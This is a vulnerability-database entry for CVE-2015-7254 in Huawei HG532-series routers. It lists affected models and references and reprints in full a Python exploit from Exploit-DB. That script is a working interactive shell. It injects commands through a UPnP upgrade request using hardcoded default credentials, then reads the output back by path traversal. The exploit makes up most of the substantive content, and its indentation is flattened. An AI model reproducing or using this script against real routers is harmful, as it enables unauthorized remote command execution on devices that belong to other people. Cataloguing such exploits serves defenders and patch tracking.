Details of VAR-E-201511-0103

ID

VAR-E-201511-0103

CVE

cve_id:

CVE-2015-7254

Trust: 1.8

sources: BID: 77506 // PACKETSTORM: 150788 // EXPLOIT-DB: 45991

EDB ID

45991

TITLE

Huawei Router HG532e - Command Execution - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 45991

DESCRIPTION

Huawei Router HG532e - Command Execution. CVE-2015-7254 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 45991

AFFECTED PRODUCTS

vendor:	huawei	model:	router hg532e	scope:	-	version:	-	Trust: 2.1
vendor:	huawei	model:	ws550-10	scope:	eq	version:	0	Trust: 0.3
vendor:	huawei	model:	ws318-10	scope:	eq	version:	0	Trust: 0.3
vendor:	huawei	model:	hg532s	scope:	eq	version:	0	Trust: 0.3
vendor:	huawei	model:	hg532n	scope:	eq	version:	0	Trust: 0.3
vendor:	huawei	model:	hg532e	scope:	eq	version:	0	Trust: 0.3
vendor:	huawei	model:	hg532	scope:	eq	version:	0	Trust: 0.3
vendor:	huawei	model:	ws550-10 v100r001c01b020	scope:	ne	version:	-	Trust: 0.3
vendor:	huawei	model:	ws550-10 v100r001c01b019	scope:	ne	version:	-	Trust: 0.3
vendor:	huawei	model:	ws318-10 v100r001c01b022	scope:	ne	version:	-	Trust: 0.3
vendor:	huawei	model:	hg532e v100r001c02b017	scope:	ne	version:	-	Trust: 0.3

sources: BID: 77506 // PACKETSTORM: 150788 // EXPLOIT-DB: 45991 // EDBNET: 100548

EXPLOIT

#!/bin/python
'''
Author : Rebellion
Github : @rebe11ion
Twitter : @rebellion
'''

import urllib2,requests,os,sys
from requests.auth import HTTPDigestAuth
DEFAULT_HEADERS = {"User-Agent": "Mozilla", }
DEFAULT_TIMEOUT = 5
def fetch_url(url):
global DEFAULT_HEADERS, DEFAULT_TIMEOUT
request = urllib2.Request(url, headers=DEFAULT_HEADERS)
data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()
return data

def exploit(ip, path):
url = "http://%s:37215/icon/../../../%s" % (ip, path)
data = fetch_url(url)
return data

def main():
pwd = "/"
cmd_path = "/tmp/ccmd"
pwd_path = "/tmp/cpwd"
while True:
targetip = sys.argv[1]
cmd_ = raw_input("[{}]$ ".format(pwd))
cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)
rm = "<?xml version=\"1.0\" ?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"
requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
assert cmd_path.startswith("/"), "An absolute path is required"
data = exploit(targetip, cmd_path)
open(cmd_path,"wb").write(data)
if "cd" in cmd_:
pass
elif "clear" in cmd_:
os.system("clear")
elif "cat" in cmd_:
os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))
else:
if "|" in cmd_:
os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))
else:
os.system("cat {}".format(cmd_path))
pwd = exploit(targetip,pwd_path).strip("\n")

if __name__ == "__main__":
main()

Trust: 1.0

sources: EXPLOIT-DB: 45991

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 45991

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 45991

TYPE

Command Execution

Trust: 1.6

sources: EXPLOIT-DB: 45991 // EDBNET: 100548

CREDITS

Rebellion

Trust: 0.6

sources: EXPLOIT-DB: 45991

EXTERNAL IDS

db:	NVD	id:	CVE-2015-7254	Trust: 1.8
db:	EXPLOIT-DB	id:	45991	Trust: 1.6
db:	EDBNET	id:	100548	Trust: 0.6
db:	PACKETSTORM	id:	150788	Trust: 0.5
db:	CERT/CC	id:	VU#438928	Trust: 0.3
db:	BID	id:	77506	Trust: 0.3

sources: BID: 77506 // PACKETSTORM: 150788 // EXPLOIT-DB: 45991 // EDBNET: 100548

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2015-7254	Trust: 1.5
url:	https://www.exploit-db.com/exploits/45991/	Trust: 0.6
url:	http://www.huawei.com	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/438928	Trust: 0.3
url:	http://www.huawei.com/en/psirt/security-advisories/2015/hw-462908	Trust: 0.3

sources: BID: 77506 // PACKETSTORM: 150788 // EXPLOIT-DB: 45991 // EDBNET: 100548

SOURCES

db:	BID	id:	77506
db:	PACKETSTORM	id:	150788
db:	EXPLOIT-DB	id:	45991
db:	EDBNET	id:	100548

LAST UPDATE DATE

2022-07-27T09:18:38.771000+00:00

SOURCES UPDATE DATE

db:

BID

id:

77506

date:

2016-11-24T01:09:00

SOURCES RELEASE DATE

db:	BID	id:	77506	date:	2015-11-06T00:00:00
db:	PACKETSTORM	id:	150788	date:	2018-12-14T20:22:22
db:	EXPLOIT-DB	id:	45991	date:	2018-12-14T00:00:00
db:	EDBNET	id:	100548	date:	2018-12-16T00:00:00

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE